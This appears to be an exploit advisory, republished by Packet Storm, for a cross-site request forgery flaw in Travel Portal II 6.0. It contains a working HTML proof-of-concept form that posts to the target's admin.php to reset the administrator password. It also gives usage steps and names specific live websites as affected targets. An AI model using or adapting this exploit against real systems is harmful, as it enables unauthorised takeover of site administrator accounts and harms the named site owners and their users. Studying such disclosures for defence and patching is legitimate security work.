Travel Portal II version 6.0 suffers from a cross site request forgery vulnerability.
62a86dc8112532213efcb4069d4e0905784a3f5239b1a32bb2fa868ea3dd6b04Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x.. UnuttuklarĂ˝mĂ˝z affola..
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel Portal II (6.0)
|~Affected Version : II 6.0 and predecessors.. / all version
|~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html
|~PRICE : 349 Euro
|~RISK : High
|~Google Keyword/Dorks : N/A
|~Tested On : Kali Linux \ Mozilla Firefox
####################INFO################################
admin password can be changed easily..
####################Usage Exploit########################
Exploitation
Edit to exploit.html target website..
Open exploit.html your browser..
Determine your new password.
GO TO ADMIN PANEL..
####################Example affected sites & Tested on#####
http://travelportal.tourismscripts.com/ ( Official Demo )
http://almarjanmakkah.com
http://www.istanbulairportal.com
==============================================================================00
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html
==============================================================================0
<h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3>
<table>
<tr>
<form method="post" action="http://[VICTIM]/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
</table>
=================================================================================
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed